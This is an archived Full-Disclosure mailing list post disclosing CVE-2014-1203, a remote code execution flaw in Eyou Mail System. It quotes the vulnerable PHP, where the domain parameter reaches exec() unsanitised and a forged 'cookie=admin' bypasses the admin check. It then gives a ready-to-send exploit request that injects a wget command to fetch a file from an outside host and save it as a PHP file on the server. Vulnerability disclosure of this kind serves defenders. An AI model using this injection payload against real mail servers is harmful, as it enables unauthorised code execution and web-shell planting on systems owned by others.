lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <2014010810561959873222@dbappsecurity.com.cn>
Date: Wed, 8 Jan 2014 10:56:21 +0800
From: conqu3r.zeng <conqu3r.zeng@...ppsecurity.com.cn>
To: full-disclosure <full-disclosure@...ts.grok.org.uk>
Cc: bugtraq <bugtraq@...urityfocus.com>
Subject: [CVE-2014-1203] Eyou Mail System Remote Code
	Execution

Hi!
The Eyou Mail System have a Remote Code Execution in \inc\fuction.php.It affects version below 3.6.
The Vulnerability fuction is get_login_ip_config_file in \inc\fuction.php.
function get_login_ip_config_file($domain, $file) {
    $dir      = '/var/eyou/Domain/'; 
    $dir_mail = exec('/var/eyou/sbin/hashid '.$domain);  //$domain can control by us.
....
}
the other file in \admin\domain\ip_login_set\d_ip_login_get.php.
<?php
...
require_once('inc/domain.config.php');
//ValidateAdmin();  //We donn't need to login in.
$domainname = get_domain(); //Get cookie  
$allow_file = 'web_login_allow_ip';  
$deny_file  = 'web_login_deny_ip';   
$domain     = trim(get('domain')); //$domain from here.
$type       = trim(get('type'));  //Get type
$res = '';
if($domainname !== 'admin' && $domainname !== $domain) { //we just need control $cookie=admin can bypass it and go on.
    echo '';
    exit;
}
if($type === 'allow') { //$type any go
    $file = $allow_file;
    $res .= 'ip_allow&';
} elseif($type === 'deny') {
    $file = $deny_file;
    $res .= 'ip_deny&';
} else {
    echo '';
    exit;
}
$file = get_login_ip_config_file($domain, $file);// use the vulnerability fuction 
if($file === FALSE) {
    echo $res;
    exit;
} 

Exp:
GET /admin/domain/ip_login_set/d_ip_login_get.php?domain=%3Bwget%20http://conqu3r.paxmac.org/exp.txt%3Bcp%20exp.txt%20exp.php&type=allow HTTP/1.1
Host: mail.xxx.com.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie:cookie=admin
Connection: keep-alive
Thanks.



conqu3r.zeng
Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ